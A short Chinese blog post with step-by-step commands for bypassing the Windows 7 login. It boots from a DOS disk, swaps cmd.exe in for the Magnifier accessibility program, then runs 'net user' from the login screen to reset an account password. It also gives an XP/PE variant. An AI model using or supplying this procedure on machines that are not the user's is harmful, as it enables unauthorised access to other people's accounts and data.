晚上看到他们在群里聊破解密码的事情,仔细一看,挺有意思的,留下来。
一.DOS下的破解方法
需要用U盘启动
1、首先我们用一个U盘启动盘启动电脑(DOS启动盘、需加载NTFS支持),当然,有能启动到dos并加载ntfs支持的启动光盘也是可以的。
2、依次输入下面命令:
md d:\abc //在D盘新建一个目录,名字叫abc;
copy c:\windows\system32\cmd.exe d:\abc //将system32文件下的cmd.exe复制到D盘abc文件夹内;
ren c:\windows\system32\magnify.exe magnify1.exe (改名放大镜启动程序) ;
ren d:\abc\cmd.exe magnify.exe (把d盘的cmd.exe重命名为magnify.exe) ;
copy d:\abc\magnify.exe c:\windows\system32(将D盘的system32文件下的cmd.exe复制到安装目录下);
OK,到了这一步,相信大家已经看出来了,我是将cmd更改了一下名字改成了magnify.exe。那么,可能会有朋友在百度里面找到过类似文章说是将cmd.exe 改成osk.exe,那个只适应在vista下面。因为轻松访问中心,在Vista下面点击后出现的选项是下一步,在Windows 7下面出现的是确定。所以替换osk.exe根本就没有用。
于是就想,既然放大镜能用,就可以替换这个程序,而用来启动cmd.exe,从而就可以更改用户密码了。
3、重新启动计算机
在登陆界面下,点击左下角辅助工具,选择第二个放大镜的程序
命令提示符就出现了,用Net User命令,就可以将用户密码更改掉,格式如下:
net user aaa 123456 // 将aaa帐户的密码改成123456,shin是我原来的用户名,此处大家根据你自己的改。
回车后马上出现:命令成功完成。
之后,就可以使用新密码进入系统了!
二.Windows XP下的破解方法
Windows 7的安全性确实做得不错,在XP下面进行文件替换的时候都提示是拒绝访问,PE
下面删除那些文件也是拒绝访问,先用FileForceKiller删除c:\windows\system32\cmd.exe和magnify.exe,删除前要选中备份复选框。
然后将生成的cmd.exe.bak再复制一份,并重命名为magnify.exe。
然后重复方法一中的步骤3.
登录后记得改回原来的cmd.exe和magnify.exe,但此时的这两个文件已经不受系统保护了,存在风险。